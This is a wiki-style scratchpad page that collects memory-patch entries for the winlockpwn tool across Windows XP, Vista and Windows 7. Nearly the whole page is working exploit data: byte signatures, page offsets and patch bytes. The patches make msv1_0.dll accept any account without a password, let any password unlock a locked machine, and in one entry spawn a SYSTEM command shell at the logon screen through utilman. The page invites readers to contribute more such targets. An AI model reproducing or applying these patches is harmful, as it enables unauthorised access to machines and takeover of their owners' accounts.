Scratchpad

This page lists offsets and payloads I've come across that can be used with winlockpwn. People who want to contribute other offsets or payloads for in-memory Windows trickery can add them here.

Looking for the easiest way to give winlockpwn a try? Download and boot a Helix LiveCD. It has winlockpwn and the required libraries preinstalled; just add the new targets you find here.


Windows 7 SP1

  {"name":"Windows 7 SP1 32bit msv1_0.dll technique, Koen Bossaert 2011 koen(dot)bossaert(at)getronics.com",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password.",
  "phase":[{
  "sig":"32C0E9AB6BFFFF",
  "pageoffset":[0x76B],
  "patch":"B001",
  "patchoffset":0x0}]
  },


  {"name":"Windows 7 SP1 32bit msv1_0.dll technique, Koen Bossaert 2011 koen(dot)bossaert(at)getronics.com (alternative patch)",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password.",
  "phase":[{
  "sig":"84C00F848E9E00008B8538F8FFFF",
  "pageoffset":[0x8E5],
  "patch":"9090",
  "patchoffset":0x0}]
  },


Windows 7 SP0 from anonymous on pastebin:

  {"name":"Win7 32-bit msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!",
  "phase":[{
  "sig":"83F8107513B0018B",
  "pageoffset":[0x926],
  "patch":"83F8109090B0018B",
  "patchoffset":0}]
  },
  {"name":"Win7 64-bit msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!",
  "phase":[{
  "sig":"C60F85C0B80000B8",
  "pageoffset":[0x926],
  "patch":"C6909090909090B8",
  "patchoffset":0}]
  },



From the original winlockpwn script:

  {"name":"WinXP SP2 Fast User Switching Unlock",
  "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
  "phase":[{
  "sig":"8BD8F7DB1ADBFEC3",
  "pageoffset":[2905],
  "patch":"bb01000000eb0990",
  "patchoffset":0}]
  },
  {"name":"WinXP SP2 Unlock",
  "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
  "phase":[{
  "sig":"0502000010",
  "pageoffset":[3696],
  "patch":"b801000000",
  "patchoffset":0}]
  },
  {"name":"WinXP SP2 msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best all-round XPSP2 technique.",
  "phase":[{
  "sig":"8BFF558BEC83EC50A1",
  "pageoffset":[0x927],
  "patch":"B001",
  "patchoffset":0xa5}]
  },
  {"name":"WinXP SP3 msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.",
  "phase":[{
  "sig":"8BFF558BEC83EC50A1",
  "pageoffset":[0x81B],
  "patch":"B001",
  "patchoffset":0xa5}]
  },
  {"name":"Windows Vista msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. Signature and offsets changed with Vista.",
  "phase":[{
  "sig":"8BFF558BEC81EC88000000A1A4",
  "pageoffset":[0x76A],
  "patch":"B001",
  "patchoffset":0xBD}]
  },
  {"name":"WinXP SP2 utilman cmd spawn",
  "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
  "phase":[
  {"name":"Patch code",
  "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
  "pageoffset":[0x39f],
  "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
  "patchoffset":0x0},
  {"name":"Patch data",
  "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
  "pageoffset":[0x9ac, 0x5ac, 0x3ac],
  "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
  "patchoffset":0x0,
  "keepgoing":True,
  }
  ]
  },